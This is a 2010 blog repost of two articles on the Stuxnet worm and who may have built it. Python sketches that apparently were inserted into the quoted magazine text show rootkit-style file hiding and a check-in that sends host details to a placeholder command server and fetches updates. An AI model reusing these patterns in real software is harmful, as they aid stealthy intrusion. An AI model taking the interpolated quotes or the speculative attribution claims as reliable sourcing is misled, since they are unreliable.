CYBERWARFARE - An International Event with Far-Reaching Implications

[work in progress] THIS ARTICLE HAS ENORMOUS IMPLICATIONS FOR LARGE
ORGANIZATIONS THAT ARE DEPENDENT ON COMPUTER TECHNOLOGY.

Think of financial institutions, governments, health systems, oil companies, traffic
management systems (airlines, trains, and so on), and many more.

Most people are not aware of the accelerating pace of our dependence on highly intelligent robots that will control major parts of our economy; robots that, sometime in the next 20 years, may be smarter than humans.
My guess is that the Israelis developed Stuxnet. They are the only ones smart enough and disciplined enough to pull it off.

The first article appeared in the Weekly Standard; the second is from a Forbes blog, whose author believes that the Chinese developed the worm.

If you are interested in security, you ought to dwell on what just happened in Iran.

joebrophy

How the Worm Turned
Stuxnet versus the Iranian nuclear program.
Dec 13, 2010, Vol. 16, No. 13 • By JONATHAN V. LAST; Weekly Standard
Last week Mahmoud Ahmadinejad acknowledged that Iran’s uranium enrichment program had suffered a setback: “They were able to disable on a limited basis some of
our centrifuges by software installed in electronic equipment,” the Iranian president told reporters. This was something of an understatement. Iran’s uranium enrichment program
appears to have been hobbled for the better part of a year, its technical resources drained and its human resources cast into disarray. The “software” in question was a computer
worm called Stuxnet, which is already being viewed as the greatest triumph in the short history of cyberwarfare.
Stuxnet first surfaced on June 17 of this year when a digital security company in Minsk, VirusBlokAda, discovered it on a computer belonging to one of its Iranian clients. It
quickly became clear that Stuxnet was not an ordinary piece of malware.

Stuxnet is not a virus, but a worm. Viruses piggyback on programs already resident in a computer. Worms are programs in their own right, which hide within a computer and
stealthily propagate themselves onto other machines. After nearly a month of study, cybersecurity engineers determined that Stuxnet was designed to tamper with industrial
systems built by the German firm Siemens by overriding their supervisory control and data acquisition (SCADA) protocols. Which is to say that, unlike most malware, which
exists to manipulate merely virtual operations, Stuxnet would have real-world consequences: It wanted to commandeer the workings of a large, industrial facility, like a
power plant, or a dam, or a factory. Exactly what kind of facility was still a mystery.   
From the beginning, everything about Stuxnet was anomalous. Worms that tampered with SCADA are not unheard of, but are exceptionally rare. And as a physical piece of
code, Stuxnet was enormous—weighing in at half a megabyte, it dwarfed the average piece of malware by many multiples. Finally, there was its infection radius. Stuxnet
found its way onto roughly 100,000 computers worldwide; 60 percent of these were in Iran.
As a work of engineering, Stuxnet’s power and elegance made it even more intriguing. Most industrial systems are run on computers which use Microsoft’s Windows operating
system. Hackers constantly probe software for what are known as “zero day” vulnerabilities, weak points in the code never foreseen by the original programmers. On a
sophisticated and ubiquitous piece of software such as Windows, discovering even a single zero day vulnerability is extremely uncommon. The makers of Stuxnet found, and
utilized, four of them. No one in cybersecurity had ever seen anything like it.
The worm gained initial access to a system through an ordinary USB drive. Picture what happens when you plug a flash drive into your computer. The machine performs a
number of tasks automatically; one of them is pulling up icons to be displayed on your screen, representing the data on the drive. On an infected USB drive, Stuxnet exploited
this routine to pull the worm onto the computer.
The challenge is that once on the machine, the worm becomes visible to security protocols, which constantly query files looking for malware. To disguise itself, Stuxnet
installed what’s called a “rootkit”—a piece of code that intercepts security queries and sends back false “safe” messages, indicating that the worm is innocuous.
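To make that mechanism concrete, here is a minimal sketch of the idea in Python, with invented file names; a real rootkit hooks kernel- or API-level calls rather than a scripting function, but the effect is the same: queries about the file system come back scrubbed.

```python
import os

# Illustrative file names only; Stuxnet's actual rootkit hid its components by
# intercepting low-level Windows file-system calls, not Python functions.
HIDDEN_NAMES = {"hidden_driver.sys", "hidden_payload.dll"}

_real_listdir = os.listdir  # keep a handle on the genuine call


def hooked_listdir(path="."):
    """Answer directory queries, silently dropping the worm's own files."""
    return [name for name in _real_listdir(path)
            if name.lower() not in HIDDEN_NAMES]


# Once the hook is in place, every caller that asks "what files are here?"
# gets a false "all clear" as far as the hidden components are concerned.
os.listdir = hooked_listdir
```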
But installing a rootkit requires using drivers, of which Windows machines are well trained to be suspicious. Windows requires that all drivers provide verification that
they’re on the up-and-up through presentation of a secure digital signature. These digital keys are closely guarded secrets. Stuxnet’s malicious drivers presented genuine signatures
from two genuine computer companies, Realtek Semiconductor and JMicron Technology. Both firms have offices in the same facility, Hsinchu Science Park, in Taiwan. Either by electronic trickery or a brick-and-mortar heist job, the creators of
Stuxnet stole these keys—and in a sophisticated enough manner that no one knew they
had been compromised.
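A toy sketch of why a stolen signing key is so valuable, using an HMAC as a stand-in for real certificate-based code signing (the key names here are invented): the operating system can only check that a trusted key produced the signature, so a driver signed with a stolen but genuine key looks exactly like a legitimate one.

```python
import hashlib
import hmac

# Stand-ins for vendor code-signing keys; real driver signing uses X.509
# certificates and public-key cryptography, but the trust decision is similar.
VENDOR_KEY = b"hypothetical-vendor-signing-key"
TRUSTED_KEYS = {VENDOR_KEY}  # keys the OS has decided to trust


def sign(driver: bytes, key: bytes) -> bytes:
    return hmac.new(key, driver, hashlib.sha256).digest()


def os_accepts(driver: bytes, signature: bytes) -> bool:
    """The OS only asks: was this signed by a key it trusts?"""
    return any(hmac.compare_digest(signature, sign(driver, k)) for k in TRUSTED_KEYS)


legit = b"legitimate network driver"
rootkit = b"malicious rootkit driver"

# A signature made with the stolen vendor key passes the same check as the real thing.
assert os_accepts(legit, sign(legit, VENDOR_KEY))
assert os_accepts(rootkit, sign(rootkit, VENDOR_KEY))
```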
So to recap: The security keys enable the drivers, which allow the installation of the
rootkit, which hides the worm that was delivered by the corrupt USB drive. Stuxnet’s
next job was to propagate itself efficiently but quietly. Whenever another USB drive was
inserted into an infected computer, it became infected, too. But in order to reduce
traceability, Stuxnet allowed each infected USB drive to pass the worm onto only three
computers.
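The three-machine cap amounts to a counter the worm keeps alongside its copy on each drive. A hypothetical sketch of that bookkeeping (the file name and layout are invented; only the limit of three comes from the article):

```python
import json
from pathlib import Path

MAX_INFECTIONS_PER_DRIVE = 3  # the limit described in the article


def try_spread_from_drive(drive_root: str) -> bool:
    """Infect the current host only if this drive has hit fewer than three machines."""
    counter = Path(drive_root) / "spread_count.json"  # hypothetical bookkeeping file
    count = json.loads(counter.read_text())["count"] if counter.exists() else 0
    if count >= MAX_INFECTIONS_PER_DRIVE:
        return False  # go quiet: this drive has done its work, limiting traceability
    # ... copy the payload onto the host here ...
    counter.write_text(json.dumps({"count": count + 1}))
    return True
```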
Stuxnet spread in other ways, too. It was not designed to propagate over the Internet at
large, but could move across local networks using print spoolers. In any group of
computers which shared a printer, when one computer became infected, Stuxnet quickly
crawled through the printer to contaminate the others. Once it reached a computer with
access to the Internet, it began communicating with command-and-control servers
located in Denmark and Malaysia. (Whoever was running the operation took these servers
offline after Stuxnet was discovered.) While they were functional, Stuxnet delivered
information it had gathered about the systems it had invaded to the servers and requested
updated versions of itself. Several different versions of Stuxnet have been isolated,
meaning that the programmers were refining the worm, even after it was released.
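The command-and-control exchange described above follows a familiar pattern: phone home with what was found on the host, and pull down a newer build if one is offered. A minimal sketch with an invented URL and report format (the real servers in Denmark and Malaysia are long gone):

```python
import json
import platform
from urllib import request

C2_URL = "http://c2.example.invalid/checkin"  # placeholder, not a real server


def check_in(current_version: str) -> bytes:
    """Report basic host details and return whatever update the server offers."""
    report = json.dumps({
        "version": current_version,
        "os": platform.platform(),
        "host": platform.node(),
    }).encode()
    req = request.Request(C2_URL, data=report,
                          headers={"Content-Type": "application/json"})
    with request.urlopen(req, timeout=10) as resp:
        return resp.read()  # an updated copy of the worm, or an empty body
```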
Finally, there’s the actual payload. Once a resident of a Windows machine, Stuxnet
looked for WinCC and PCS 7 SCADA programs. If the machine had neither of these,
then Stuxnet merely went about the business of spreading itself. But on computers with
one of these two programs, Stuxnet began reprogramming the programmable logic control
(PLC) software and making changes in a piece of code called Operational Block 35. For
months, no one knew exactly what Stuxnet was looking for with this block of code or
what it intended to do once it found it. Three weeks ago, that changed.
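In outline, the targeting decision described here is a simple gate: tamper only where the Siemens SCADA software lives, otherwise stay quiet and keep spreading. A hypothetical sketch (checking installed-program names is an illustrative stand-in for how Stuxnet actually fingerprinted its targets):

```python
TARGET_SOFTWARE = {"Siemens SIMATIC WinCC", "Siemens SIMATIC PCS 7"}  # from the article


def choose_behavior(installed: set[str]) -> str:
    """Only machines running the targeted SCADA software get the PLC payload."""
    if TARGET_SOFTWARE & installed:
        return "rewrite PLC logic (the code the article calls Operational Block 35)"
    return "stay dormant and keep propagating"


print(choose_behavior({"Siemens SIMATIC WinCC", "Microsoft Office"}))
print(choose_behavior({"Microsoft Office"}))
```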
As cybersecurity engineer Ralph Langner puts it, Stuxnet was one weapon with two
warheads. The first payload was aimed at the Siemens S7-417 controller at Iran’s
Bushehr nuclear power plant. The second targeted the Siemens S7-315 controller at the
Natanz centrifuge operation, where uranium is processed and enriched. At Bushehr,
Stuxnet likely attempted to degrade the facility’s steam turbine, with unknown results.
But the attack on Natanz seems to have succeeded brilliantly.
Once again, Stuxnet’s design was unexpectedly elegant. With control of the centrifuge
system at Natanz, the worm could have triggered a single, catastrophic incident. Instead,
Stuxnet took over the centrifuge’s frequency converters during the course of everyday
operation and induced tiny bursts of speed in the machinery, followed by abrupt
decelerations. These speed changes stressed the centrifuge’s components. Parts wore out
quickly, centrifuges broke mysteriously. The uranium being processed was corrupted.
And all the while, Stuxnet kept sending normal feedback to the Iranians, telling them
that, from the computer’s standpoint, the system was operating like clockwork. This slow
burn went on for a year, with the Iranians becoming increasingly exasperated by what
looked like sabotage, and smelled like sabotage, but what their computers assured them
was perfectly routine.
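A toy simulation of that pattern, with made-up numbers: occasional over-speed bursts and abrupt decelerations accumulate mechanical wear, while the telemetry shown to operators never budges from nominal.

```python
NOMINAL_HZ = 1000      # illustrative nominal converter frequency, not a real figure
ATTACK_EVERY = 50      # attack burst every N control cycles (arbitrary for the sketch)


def run_cycles(n_cycles: int):
    """Return accumulated wear and the frequencies *reported* to operators."""
    wear = 0.0
    reported = []
    for cycle in range(n_cycles):
        if cycle > 0 and cycle % ATTACK_EVERY == 0:
            actual = NOMINAL_HZ * 1.3   # brief burst well above nominal
        elif cycle > 1 and cycle % ATTACK_EVERY == 1:
            actual = NOMINAL_HZ * 0.1   # abrupt deceleration right after the burst
        else:
            actual = NOMINAL_HZ         # normal operation the rest of the time
        wear += abs(actual - NOMINAL_HZ) / NOMINAL_HZ  # wear grows with each excursion
        reported.append(NOMINAL_HZ)     # operators only ever see "normal"
    return wear, reported


wear, telemetry = run_cycles(10_000)
always_nominal = set(telemetry) == {NOMINAL_HZ}
print(f"accumulated wear units: {wear:.0f}; telemetry always nominal: {always_nominal}")
```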
In sum, Stuxnet wasted a year’s worth of enrichment efforts at Natanz, ate through
centrifuge components and uranium stores, sowed chaos within Iran’s nuclear program,
and will likely force Iran to spend another year disinfecting its systems before they can
operate at peak levels again. All in all, a successful operation.
Who deserves credit for Stuxnet? There are three possibilities: (1) a lone state actor; (2) a
consortium of states; or (3) a private group. Each of these is at first glance plausible. But
the exploit was even more complicated than it appears on first inspection.
The planning and implementation of Stuxnet involved three layers of complication. First,
there’s the sophistication of the worm itself. Microsoft estimates that the coding of
Stuxnet consumed somewhere in the neighborhood of 10,000 man-work days. With a
team of 30 to 50 programmers, that’s a year or two of effort, at least. Between the
workload, the zero day exploits, and the innovative design of the worm, Stuxnet required
not just time but enormous technical sophistication and sizable financial resources.
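For scale, the arithmetic is straightforward: 10,000 man-days spread across 30 to 50 programmers comes to roughly 200 to 330 working days apiece, on the order of a year to a year and a half of full-time work per person, before counting testing or the intelligence gathering described below.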
On the next level, the creators of Stuxnet needed competency in the more traditional
cloak-and-dagger elements of espionage. The digital verification certificates had to be
stolen from the companies in Taiwan, and the infected USB drives had to be planted on
or around the community of people who worked in the Iranian nuclear program—modern
espionage tradecraft at its best.
The final complication is that vast amounts of expertise in nuclear engineering were
required. It’s not enough to design a worm to infiltrate a nuclear plant—Stuxnet’s
creators had to know (1) what parts of the systems to target, (2) the intricacies of the
systems’ designs, and (3) how to manipulate the systems to achieve the desired effects.
This knowledge base might have been the most difficult to obtain. The world is full of
enterprising computer jocks; there are only so many people who understand exactly how
centrifuges and nuclear reactors work and the minute complexities of Siemens’s S7-315
and S7-417 control systems. It seems unlikely that a private party—a group of rogue
hackers or interested civilians—could amass the requisite competencies in all three of
these areas.
So who was it—the Israelis, the United States, Germany, Russia? Some combination of
the above? We may never know. Given the scope of the operation, it’s amazing that we
understand as much as we already do about Stuxnet. Most prior acts of cyberwarfare
took place in the shadows; Stuxnet is the first serious cyberweapon to be caught in the
wild by civilians. As a result, we’ve witnessed over the last few months an open-source
investigation involving experts in different disciplines from around the world. The techies
will continue to push and prod Stuxnet, trying to understand how it worked—and how
systems can be protected from a similar attack.
Because, in fundamental ways, cyberwar is no different from real war. Innovations can
be copied, and there is always the potential for enemies to turn them to their advantage.


 

Stuxnet’s Finnish-Chinese Connection
Dec. 14, 2010, 8:07 am • Posted by Jeffrey Carr; Forbes blog

I recently wrote a white paper entitled “Dragons, Tigers, Pearls, and Yellowcake” in which I proposed four alternative scenarios for the Stuxnet worm other than the commonly held assumption that it was Israel or the U.S. targeting Iran’s Bushehr or Natanz facilities. During the course of my research for that paper, I uncovered a connection between two of the key players in the Stuxnet drama: Vacon, the Finnish manufacturer of one of two frequency converter drives targeted by this malware; and RealTek, whose digital certificate was stolen and used to smooth the way for the worm to be loaded onto a Windows host without raising any alarms. A third important piece of the puzzle, which I’ll discuss later in this article, directly connects a Chinese antivirus company which writes its own viruses with the Stuxnet worm.

Most people who have followed the Stuxnet investigation know that the international headquarters for Vacon is in Finland, but surprisingly, Finland isn’t where Vacon’s frequency converter drives are manufactured. Vacon’s manufacturing plant is actually located in the People’s Republic of China (PRC) under the name Vacon Suzhou Drives Co. Ltd., located at 11A, Suchun Industrial Square 428# Xinglong Street, SIP Suzhou 215126 China.

Vacon isn’t the only company involved with Stuxnet that has a Chinese connection. The first genuine digital certificate used by Stuxnet developers was from RealTek Semiconductor Corp., a Taiwanese company which has a subsidiary in (of all places) Suzhou under the name Realsil Microelectronics, Inc. (450 Shenhu Road, Suzhou Industrial Park, Suzhou 215021 Jiangsu Province, China).

The question, of course, is what, if anything, does this say about China’s possible role as the source of the Stuxnet worm. There are scenarios under which China would benefit, such as the rare-earths scenario that I presented in my white paper; however, there’s a lack of data on mining failures that can be attributed to Stuxnet. The closest that anyone has come to identifying compromised operations is at Natanz; however, their centrifuge failures go back several years according to this February 2010 report by ISIS, while the earliest Stuxnet sample seen by Symantec’s researchers was from June 2009, before it had signed driver files or exploited the remote code execution vulnerability, which appeared in January 2010 and March 2010 respectively. Natanz may very well have been the target of an earlier cyber attack, or even multiple attacks, which had nothing to do with Stuxnet.

Does China Benefit By Attacking Natanz?

In 2008, China decided to assist the IAEA inspectors after it learned that Iran was in possession of blueprints to shape uranium metal into warheads, according to this article in The Telegraph. That same article discloses that Chinese designs for centrifuges were discovered in Iran, supplied via Pakistan’s AQ Khan.

On April 13, 2010, Beijing reiterated its opposition to Iran’s goal to develop nuclear weapons capabilities while stating that sanctions against Iran would be counter-productive. In other words, the PRC wanted to support its third-largest supplier of oil (after Saudi Arabia and Angola) while at the same time seeking ways to get Iran to stop its uranium fuel enrichment program. What better way to accomplish that goal than by covertly creating a virus that will sabotage Natanz’s centrifuges in a way that simulates mechanical failure, while overtly supporting the Iranian government by opposing sanctions pushed by the U.S.? It’s both simple and elegant. Even if the worm was discovered before it accomplished its mission, who would blame China, Iran’s strongest ally, when the most obvious culprits would be Israel and the U.S.?

Reviewing The Evidence

1. China has an intimate knowledge of Iran’s centrifuges since, according to one source quoted above, they’re of Chinese design.

2. China has better access than any other country to manufacturing plans for the Vacon frequency converter drive made by Vacon’s Suzhou facility and specifically targeted by the Stuxnet worm (along with an Iranian company’s drive). Furthermore, in March 2010, China’s Customs ministry started an audit at Vacon’s Suzhou facility and took two employees into custody, thereby providing further access to Vacon’s manufacturing specifications under cover of an active investigation.

3. China has better access than any other country to RealTek’s digital certificates through its Realsil office in Suzhou and, secondarily, to JMicron’s office in Taiwan.

4. China has direct access to Windows source code, which would explain how a malware team could create four key zero day vulnerabilities for Windows when most hackers find it challenging to develop even one.

5. There were no instances of Stuxnet infections in the PRC until very late, which never made sense to me, particularly when Siemens software is pervasive throughout China’s power installations. Then, almost as an afterthought and over three months after the virus was first discovered, Chinese media reported one million infections, and here’s where the evidence becomes really interesting.

That report originated with a Chinese antivirus company called Rising International, who we now know colluded with an official in Beijing’s Public Security Bureau to make announcements encouraging Chinese citizens to download AV software from Rising International (RI) to fight a new virus that RI had secretly created in its own lab. Considering this new information, RI’s Stuxnet announcement sounds more like a CYA strategy from the worm’s originators than anything else.

In Summary

The conventional wisdom on which nation state was responsible for the Stuxnet worm has relentlessly pointed the finger at Israel or the United States almost from day one of the worm’s discovery. No other scenarios were discussed or even considered, with the exception of my own conjecture about India’s INSAT-4b satellite failure and Britain’s Heysham 1 nuclear plant shutdown, and then my white paper proposing four additional alternative scenarios; all of which were my way of trying (and failing) to expand the discussion beyond Israel and Iran. The appeal of a U.S. or Israeli cyber attack against first Bushehr, then Natanz, was just too good to pass up, even though there was no hard evidence and very slim circumstantial evidence to support a case for either country. The best that Ralph Langner, CEO of Langner Communications (and the leading evangelist for this scenario), could point to was an obscure Hebrew word for Myrtus and a biblical reference for a date found in the malware that pertained to Persia, both of which could have been explained in a half dozen alternate ways having nothing to do with either Israel or the U.S.

As far as China goes, I’ve identified five distinct ties to Stuxnet that are unique to China, as well as provided a rationale for the attack which fits China’s unique role as Iran’s ally and customer while opposing Iran’s fuel enrichment plans. There’s still a distinct lack of information on any other facilities that suffered damage, and no good explanations for why there was such massive collateral damage across dozens of countries if only one or two facilities in one nation state were the targets. However, based solely on the known facts, I consider China to be the most likely candidate for Stuxnet’s origin.
___________________________________________________________

Brophy | Saturday 18 December 2010 - 7:49 pm | Brophy Blog
